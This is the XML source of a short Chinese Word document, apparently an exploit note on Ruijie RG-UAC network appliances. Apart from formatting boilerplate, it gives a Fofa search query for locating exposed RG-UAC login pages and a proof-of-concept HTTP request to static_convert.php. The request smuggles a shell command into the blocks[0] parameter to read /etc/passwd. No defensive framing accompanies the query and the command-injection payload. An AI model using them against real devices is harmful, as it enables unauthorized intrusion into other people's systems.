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9A2170C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Fofa语法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A27655">
      <w:pPr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Title=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>RG-UAC登录页面</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E35E384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漏洞POC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0EF8C1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2A9E5D38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 xml:space="preserve">GET /view/IPV6/naborTable/static_convert.php?blocks[0]=||cat%20%2fetc%2fpasswd HTTP/1.1 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="11D8EC97"/>
    <w:p w14:paraId="33C2864D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Y1MmRmNDMwNTY5OTYyNDM2N2VjMmMzMjg5NmJjMmQifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="57FD1524"/>
    <w:rsid w:val="00B4047C"/>
    <w:rsid w:val="0E6B247B"/>
    <w:rsid w:val="0FF7FEA5"/>
    <w:rsid w:val="13DFAD20"/>
    <w:rsid w:val="1785A926"/>
    <w:rsid w:val="17E55D5F"/>
    <w:rsid w:val="1B97CA72"/>
    <w:rsid w:val="1E7A3B29"/>
    <w:rsid w:val="1F5F8E86"/>
    <w:rsid w:val="1F9F2A16"/>
    <w:rsid w:val="1FF3D49F"/>
    <w:rsid w:val="1FFF89E9"/>
    <w:rsid w:val="299F9458"/>
    <w:rsid w:val="29F99800"/>
    <w:rsid w:val="2BBE0817"/>
    <w:rsid w:val="2BFF4FB5"/>
    <w:rsid w:val="2BFF5176"/>
    <w:rsid w:val="2DB5FEFB"/>
    <w:rsid w:val="2DD27B69"/>
    <w:rsid w:val="2DD34CCD"/>
    <w:rsid w:val="2DD5B0C0"/>
    <w:rsid w:val="2EFF020B"/>
    <w:rsid w:val="2FBFBFFB"/>
    <w:rsid w:val="2FDF3766"/>
    <w:rsid w:val="2FFF4B20"/>
    <w:rsid w:val="33397BD2"/>
    <w:rsid w:val="37D79716"/>
    <w:rsid w:val="37EE8CD9"/>
    <w:rsid w:val="37FF2A93"/>
    <w:rsid w:val="37FF9796"/>
    <w:rsid w:val="387F2B36"/>
    <w:rsid w:val="3AB73EF0"/>
    <w:rsid w:val="3BDFC0B7"/>
    <w:rsid w:val="3C93886E"/>
    <w:rsid w:val="3CEF9AF8"/>
    <w:rsid w:val="3D79E67D"/>
    <w:rsid w:val="3EB31C8B"/>
    <w:rsid w:val="3EFC37B8"/>
    <w:rsid w:val="3EFFD843"/>
    <w:rsid w:val="3FBFCB8B"/>
    <w:rsid w:val="3FDEA6AA"/>
    <w:rsid w:val="3FEB3B3D"/>
    <w:rsid w:val="3FF80E9F"/>
    <w:rsid w:val="3FFCDE76"/>
    <w:rsid w:val="418F03C1"/>
    <w:rsid w:val="42FD4AE6"/>
    <w:rsid w:val="45194C57"/>
    <w:rsid w:val="48D5008D"/>
    <w:rsid w:val="49E73956"/>
    <w:rsid w:val="4F4E1CE2"/>
    <w:rsid w:val="4FDCCC2A"/>
    <w:rsid w:val="4FF7A29A"/>
    <w:rsid w:val="4FFB5482"/>
    <w:rsid w:val="524E74B2"/>
    <w:rsid w:val="53E3D198"/>
    <w:rsid w:val="54FD31BC"/>
    <w:rsid w:val="55BF7986"/>
    <w:rsid w:val="55EBD72F"/>
    <w:rsid w:val="56E7394D"/>
    <w:rsid w:val="57771623"/>
    <w:rsid w:val="577BEC18"/>
    <w:rsid w:val="57FD1524"/>
    <w:rsid w:val="5AFD7C30"/>
    <w:rsid w:val="5B6E52F5"/>
    <w:rsid w:val="5BCDD2E7"/>
    <w:rsid w:val="5BD77C15"/>
    <w:rsid w:val="5BFD9482"/>
    <w:rsid w:val="5D7B3FBC"/>
    <w:rsid w:val="5DFB9FF8"/>
    <w:rsid w:val="5E671392"/>
    <w:rsid w:val="5EEB849B"/>
    <w:rsid w:val="5EFD149D"/>
    <w:rsid w:val="5F7A13AB"/>
    <w:rsid w:val="5F7F0FB8"/>
    <w:rsid w:val="5FBF167B"/>
    <w:rsid w:val="5FED12B8"/>
    <w:rsid w:val="5FF1F784"/>
    <w:rsid w:val="5FF3E307"/>
    <w:rsid w:val="60238493"/>
    <w:rsid w:val="617F880E"/>
    <w:rsid w:val="61853D5A"/>
    <w:rsid w:val="63DBC652"/>
    <w:rsid w:val="65FF423B"/>
    <w:rsid w:val="6690A103"/>
    <w:rsid w:val="67E7CB12"/>
    <w:rsid w:val="67FF23E7"/>
    <w:rsid w:val="67FFF15E"/>
    <w:rsid w:val="684F53CA"/>
    <w:rsid w:val="6B54702E"/>
    <w:rsid w:val="6BBB4FAF"/>
    <w:rsid w:val="6BCDD5AF"/>
    <w:rsid w:val="6BDF1674"/>
    <w:rsid w:val="6BF3A92F"/>
    <w:rsid w:val="6D7E2FFF"/>
    <w:rsid w:val="6DB22A8C"/>
    <w:rsid w:val="6EBBFE9E"/>
    <w:rsid w:val="6EF70D5B"/>
    <w:rsid w:val="6EFB71B1"/>
    <w:rsid w:val="6EFE788C"/>
    <w:rsid w:val="6F6F2774"/>
    <w:rsid w:val="6FBD7CF2"/>
    <w:rsid w:val="6FE75C91"/>
    <w:rsid w:val="6FEE5854"/>
    <w:rsid w:val="7020421A"/>
    <w:rsid w:val="70B63205"/>
    <w:rsid w:val="72CFED86"/>
    <w:rsid w:val="73A9F55B"/>
    <w:rsid w:val="73C94D1C"/>
    <w:rsid w:val="73CBABE1"/>
    <w:rsid w:val="73DF1153"/>
    <w:rsid w:val="73FD6563"/>
    <w:rsid w:val="75FDE963"/>
    <w:rsid w:val="76BF7AB2"/>
    <w:rsid w:val="76C18528"/>
    <w:rsid w:val="76EB1E07"/>
    <w:rsid w:val="77E42D04"/>
    <w:rsid w:val="77FB1747"/>
    <w:rsid w:val="77FFE35A"/>
    <w:rsid w:val="785F0ADD"/>
    <w:rsid w:val="7956CD3D"/>
    <w:rsid w:val="79FFF76A"/>
    <w:rsid w:val="7A7BBABE"/>
    <w:rsid w:val="7A95D0EB"/>
    <w:rsid w:val="7AD64DD6"/>
    <w:rsid w:val="7AF94817"/>
    <w:rsid w:val="7B3BD7E9"/>
    <w:rsid w:val="7B7A30CF"/>
    <w:rsid w:val="7B7B0B69"/>
    <w:rsid w:val="7B995757"/>
    <w:rsid w:val="7BADE33A"/>
    <w:rsid w:val="7BD7F576"/>
    <w:rsid w:val="7BF7E1F0"/>
    <w:rsid w:val="7BF7ECA9"/>
    <w:rsid w:val="7BFF60DD"/>
    <w:rsid w:val="7CD5C5D6"/>
    <w:rsid w:val="7CF6A534"/>
    <w:rsid w:val="7CF7A1BC"/>
    <w:rsid w:val="7D39CCA9"/>
    <w:rsid w:val="7D7FDF5C"/>
    <w:rsid w:val="7DFFA47E"/>
    <w:rsid w:val="7E6E81D2"/>
    <w:rsid w:val="7E78C45A"/>
    <w:rsid w:val="7E7BCD1C"/>
    <w:rsid w:val="7E7E60FB"/>
    <w:rsid w:val="7E9F6F51"/>
    <w:rsid w:val="7EAE9A02"/>
    <w:rsid w:val="7EBDF6C6"/>
    <w:rsid w:val="7EFC1F47"/>
    <w:rsid w:val="7EFDDE9E"/>
    <w:rsid w:val="7F26BCBA"/>
    <w:rsid w:val="7F376BCC"/>
    <w:rsid w:val="7F3E08FE"/>
    <w:rsid w:val="7F3F55B7"/>
    <w:rsid w:val="7F6F3B96"/>
    <w:rsid w:val="7F765816"/>
    <w:rsid w:val="7FAFBBCC"/>
    <w:rsid w:val="7FB3A4A5"/>
    <w:rsid w:val="7FB7D77D"/>
    <w:rsid w:val="7FBB719F"/>
    <w:rsid w:val="7FBEA1CB"/>
    <w:rsid w:val="7FCE339B"/>
    <w:rsid w:val="7FD73586"/>
    <w:rsid w:val="7FDB36B4"/>
    <w:rsid w:val="7FDB6353"/>
    <w:rsid w:val="7FDF2293"/>
    <w:rsid w:val="7FDF396C"/>
    <w:rsid w:val="7FE69C24"/>
    <w:rsid w:val="7FED6077"/>
    <w:rsid w:val="7FED80C6"/>
    <w:rsid w:val="7FEFB24F"/>
    <w:rsid w:val="7FF2849D"/>
    <w:rsid w:val="7FF52585"/>
    <w:rsid w:val="7FFAE25C"/>
    <w:rsid w:val="7FFDE5C5"/>
    <w:rsid w:val="7FFE79BD"/>
    <w:rsid w:val="7FFF692E"/>
    <w:rsid w:val="7FFFCBF4"/>
    <w:rsid w:val="7FFFE085"/>
    <w:rsid w:val="8AB78574"/>
    <w:rsid w:val="903BCFC1"/>
    <w:rsid w:val="93F99F0F"/>
    <w:rsid w:val="967B4632"/>
    <w:rsid w:val="97AE0B38"/>
    <w:rsid w:val="99FFFF3F"/>
    <w:rsid w:val="9AFD16AC"/>
    <w:rsid w:val="9BCF7D2B"/>
    <w:rsid w:val="9CFEACB1"/>
    <w:rsid w:val="9F7CD18D"/>
    <w:rsid w:val="9F9720AE"/>
    <w:rsid w:val="9FAF2B7F"/>
    <w:rsid w:val="9FDAB30B"/>
    <w:rsid w:val="9FFDAEBF"/>
    <w:rsid w:val="9FFF3431"/>
    <w:rsid w:val="A1FD5A70"/>
    <w:rsid w:val="A27E69B0"/>
    <w:rsid w:val="A3D3B5AD"/>
    <w:rsid w:val="A6FDCE76"/>
    <w:rsid w:val="A8FB678E"/>
    <w:rsid w:val="AD5B8CAC"/>
    <w:rsid w:val="AEFED516"/>
    <w:rsid w:val="AF47AD03"/>
    <w:rsid w:val="AFB6F41D"/>
    <w:rsid w:val="B0974690"/>
    <w:rsid w:val="B47F41C3"/>
    <w:rsid w:val="B53FB2C1"/>
    <w:rsid w:val="B73E3741"/>
    <w:rsid w:val="B7FF178E"/>
    <w:rsid w:val="B96C5A42"/>
    <w:rsid w:val="BB6E64CC"/>
    <w:rsid w:val="BDEE8467"/>
    <w:rsid w:val="BDFF1BC3"/>
    <w:rsid w:val="BDFF3D9F"/>
    <w:rsid w:val="BE77A9F7"/>
    <w:rsid w:val="BF5D1E32"/>
    <w:rsid w:val="BFB37021"/>
    <w:rsid w:val="BFF7428B"/>
    <w:rsid w:val="BFFEEB34"/>
    <w:rsid w:val="BFFFD0DE"/>
    <w:rsid w:val="BFFFFF57"/>
    <w:rsid w:val="C35F894E"/>
    <w:rsid w:val="C3FE21AB"/>
    <w:rsid w:val="C725C9FC"/>
    <w:rsid w:val="CAF582E6"/>
    <w:rsid w:val="CBBE2114"/>
    <w:rsid w:val="CBFF7C50"/>
    <w:rsid w:val="CD6FAFC1"/>
    <w:rsid w:val="CFDEC857"/>
    <w:rsid w:val="CFEB1D61"/>
    <w:rsid w:val="CFFA9BEF"/>
    <w:rsid w:val="CFFF237C"/>
    <w:rsid w:val="D47BD7E0"/>
    <w:rsid w:val="D7344563"/>
    <w:rsid w:val="D7B732F6"/>
    <w:rsid w:val="D8BF77E5"/>
    <w:rsid w:val="D9AD4A21"/>
    <w:rsid w:val="D9BBCE23"/>
    <w:rsid w:val="DBA4F869"/>
    <w:rsid w:val="DD7D3824"/>
    <w:rsid w:val="DDDFE8FB"/>
    <w:rsid w:val="DE7FDD73"/>
    <w:rsid w:val="DEF9DEED"/>
    <w:rsid w:val="DFCF9D82"/>
    <w:rsid w:val="DFF54C4B"/>
    <w:rsid w:val="DFF63828"/>
    <w:rsid w:val="DFFF08E0"/>
    <w:rsid w:val="DFFFC62C"/>
    <w:rsid w:val="E2DF4477"/>
    <w:rsid w:val="E59FF217"/>
    <w:rsid w:val="E77B0D1F"/>
    <w:rsid w:val="E79B4105"/>
    <w:rsid w:val="E7FA619A"/>
    <w:rsid w:val="E9ED6298"/>
    <w:rsid w:val="EB3FABDA"/>
    <w:rsid w:val="EB9F36C9"/>
    <w:rsid w:val="EBF91784"/>
    <w:rsid w:val="ECB7AB14"/>
    <w:rsid w:val="ECFE5741"/>
    <w:rsid w:val="EDBFE5F3"/>
    <w:rsid w:val="EE3F6450"/>
    <w:rsid w:val="EF7D3A8B"/>
    <w:rsid w:val="EFF9367F"/>
    <w:rsid w:val="EFFAC8C3"/>
    <w:rsid w:val="EFFF8005"/>
    <w:rsid w:val="EFFFA52C"/>
    <w:rsid w:val="EFFFAB75"/>
    <w:rsid w:val="F0FAAA88"/>
    <w:rsid w:val="F1FDE6F5"/>
    <w:rsid w:val="F1FF2A92"/>
    <w:rsid w:val="F27D5C03"/>
    <w:rsid w:val="F27FCA1F"/>
    <w:rsid w:val="F297FCDB"/>
    <w:rsid w:val="F3BF0145"/>
    <w:rsid w:val="F3FBB573"/>
    <w:rsid w:val="F4B7A44D"/>
    <w:rsid w:val="F57112A3"/>
    <w:rsid w:val="F5AB2C7D"/>
    <w:rsid w:val="F5B36BE9"/>
    <w:rsid w:val="F5BF77B4"/>
    <w:rsid w:val="F5F72DF8"/>
    <w:rsid w:val="F6273DA8"/>
    <w:rsid w:val="F6690D7E"/>
    <w:rsid w:val="F6FBF995"/>
    <w:rsid w:val="F76B3DD1"/>
    <w:rsid w:val="F7778859"/>
    <w:rsid w:val="F77FFC25"/>
    <w:rsid w:val="F79E8BA0"/>
    <w:rsid w:val="F7D95AD9"/>
    <w:rsid w:val="F7DB388E"/>
    <w:rsid w:val="F7E28B87"/>
    <w:rsid w:val="F7F5C8C0"/>
    <w:rsid w:val="F7FF6A77"/>
    <w:rsid w:val="F8BF8985"/>
    <w:rsid w:val="F97FB8ED"/>
    <w:rsid w:val="F9962060"/>
    <w:rsid w:val="F9CB2FFD"/>
    <w:rsid w:val="F9E62CBF"/>
    <w:rsid w:val="F9F3E506"/>
    <w:rsid w:val="F9F7F0EB"/>
    <w:rsid w:val="F9FF8D69"/>
    <w:rsid w:val="FA324E87"/>
    <w:rsid w:val="FAFBD3D7"/>
    <w:rsid w:val="FAFDEFD2"/>
    <w:rsid w:val="FAFEF8A2"/>
    <w:rsid w:val="FB5F0364"/>
    <w:rsid w:val="FBA30457"/>
    <w:rsid w:val="FBCB6F0D"/>
    <w:rsid w:val="FBEC3635"/>
    <w:rsid w:val="FBFB645F"/>
    <w:rsid w:val="FC7F72EA"/>
    <w:rsid w:val="FCF06FFB"/>
    <w:rsid w:val="FD1EE484"/>
    <w:rsid w:val="FD4FF5F1"/>
    <w:rsid w:val="FD6AEB77"/>
    <w:rsid w:val="FD7F4FD3"/>
    <w:rsid w:val="FD7F867D"/>
    <w:rsid w:val="FDADAFFC"/>
    <w:rsid w:val="FDB75070"/>
    <w:rsid w:val="FDBE7BD1"/>
    <w:rsid w:val="FDBFAA8F"/>
    <w:rsid w:val="FDBFD45E"/>
    <w:rsid w:val="FDEE5A13"/>
    <w:rsid w:val="FDF1F0A9"/>
    <w:rsid w:val="FDFBD708"/>
    <w:rsid w:val="FDFFBEF1"/>
    <w:rsid w:val="FE7B1328"/>
    <w:rsid w:val="FE9BFA22"/>
    <w:rsid w:val="FEDE071F"/>
    <w:rsid w:val="FEEBBCF6"/>
    <w:rsid w:val="FEF27B8B"/>
    <w:rsid w:val="FEFA3455"/>
    <w:rsid w:val="FEFC3A5C"/>
    <w:rsid w:val="FEFC4869"/>
    <w:rsid w:val="FF4FFC4C"/>
    <w:rsid w:val="FF5DA5AC"/>
    <w:rsid w:val="FF679AA1"/>
    <w:rsid w:val="FF6D89C7"/>
    <w:rsid w:val="FF7BC27C"/>
    <w:rsid w:val="FF7CA208"/>
    <w:rsid w:val="FF7FA203"/>
    <w:rsid w:val="FFBC1160"/>
    <w:rsid w:val="FFBCCD69"/>
    <w:rsid w:val="FFBDD75C"/>
    <w:rsid w:val="FFBF78FF"/>
    <w:rsid w:val="FFBF7C90"/>
    <w:rsid w:val="FFDEFE55"/>
    <w:rsid w:val="FFDF9E60"/>
    <w:rsid w:val="FFDFA1FC"/>
    <w:rsid w:val="FFDFC11F"/>
    <w:rsid w:val="FFE4EA8F"/>
    <w:rsid w:val="FFEF119A"/>
    <w:rsid w:val="FFF11AE6"/>
    <w:rsid w:val="FFF3FA3D"/>
    <w:rsid w:val="FFF7BF3C"/>
    <w:rsid w:val="FFF9B26C"/>
    <w:rsid w:val="FFFB349C"/>
    <w:rsid w:val="FFFB3EFB"/>
    <w:rsid w:val="FFFC469D"/>
    <w:rsid w:val="FFFC8503"/>
    <w:rsid w:val="FFFD6A02"/>
    <w:rsid w:val="FFFDF767"/>
    <w:rsid w:val="FFFE2F17"/>
    <w:rsid w:val="FFFF0078"/>
    <w:rsid w:val="FFFFE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autoRedefine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7">
    <w:name w:val="Default Paragraph Font"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="table" w:default="1" w:styleId="5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Hyperlink"/>
    <w:basedOn w:val="7"/>
    <w:autoRedefine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42</Words>
  <Characters>450</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>1</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>476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2024-03-07T08:56:00Z</dcterms:created>
  <dc:creator>路边菜贩子</dc:creator>
  <cp:lastModifiedBy>W.CONG</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-18T00:37:16Z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239BAF64848D2AE6A9B1B1659314282A_41</vt:lpwstr>
  </property>
</Properties>
</file>